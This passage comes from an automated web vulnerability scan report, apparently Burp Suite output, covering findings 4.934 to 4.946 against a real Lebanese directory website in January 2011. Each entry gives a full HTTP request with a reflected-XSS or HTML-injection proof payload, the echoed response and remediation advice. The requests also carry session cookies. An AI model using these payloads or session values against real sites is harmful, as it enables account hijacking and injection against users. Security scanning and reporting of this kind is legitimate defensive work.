Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping57c3a"><a>c11e6e3cec5">
...[SNIP]...

4.934. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1064d'-alert(1)-'32dc8d23c03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods1064d'-alert(1)-'32dc8d23c03/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods1064d'-alert(1)-'32dc8d23c03/235690923/Tobacconist/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.935. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d621b<script>alert(1)</script>1d1f7d4de41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsd621b<script>alert(1)</script>1d1f7d4de41/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsd621b<script>alert(1)</script>1d1f7d4de41 <a href="#" id="backlink">
...[SNIP]...

4.936. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4173'-alert(1)-'62e52d4dd2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923c4173'-alert(1)-'62e52d4dd2d/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:47:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods/235690923c4173'-alert(1)-'62e52d4dd2d/Tobacconist/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.937. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d93'-alert(1)-'80b6f4fab88 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Tobacconist53d93'-alert(1)-'80b6f4fab88/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Tobacconist53d93'-alert(1)-'80b6f4fab88/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.938. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf079'-alert(1)-'a48770eb1b3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Tobacconist/29bf079'-alert(1)-'a48770eb1b3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods/235690923/Tobacconist/29bf079'-alert(1)-'a48770eb1b3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.939. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af0c'-alert(1)-'a39c125638d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping3af0c'-alert(1)-'a39c125638d/Equipment-Gadgets/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping3af0c'-alert(1)-'a39c125638d/Equipment-Gadgets';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.940. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c7db"><a>3daf329a215 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping8c7db"><a>3daf329a215/Equipment-Gadgets/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping8c7db"><a>3daf329a215">
...[SNIP]...

4.941. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2184c'-alert(1)-'caeee647c97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets2184c'-alert(1)-'caeee647c97/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets2184c'-alert(1)-'caeee647c97';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.942. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd721<script>alert(1)</script>612f6ddb2e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgetscd721<script>alert(1)</script>612f6ddb2e8/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgetscd721<script>alert(1)</script>612f6ddb2e8 <a href="#" id="backlink">
...[SNIP]...

4.943. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 367bb'-alert(1)-'d7a25211229 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping367bb'-alert(1)-'d7a25211229/Equipment-Gadgets/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:59:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping367bb'-alert(1)-'d7a25211229/Equipment-Gadgets/339412286/Equipment-Gadgets/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.944. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2341a"><a>75abcf4375b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2341a"><a>75abcf4375b/Equipment-Gadgets/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:50:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2341a"><a>75abcf4375b">
...[SNIP]...

4.945. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ecc06<script>alert(1)</script>33a2ca35e1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgetsecc06<script>alert(1)</script>33a2ca35e1d/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgetsecc06<script>alert(1)</script>33a2ca35e1d <a href="#" id="backlink">
...[SNIP]...

4.946. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a2d'-alert(1)-'ba813a337b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets64a2d'-alert(1)-'ba813a337b6/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:02:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59893

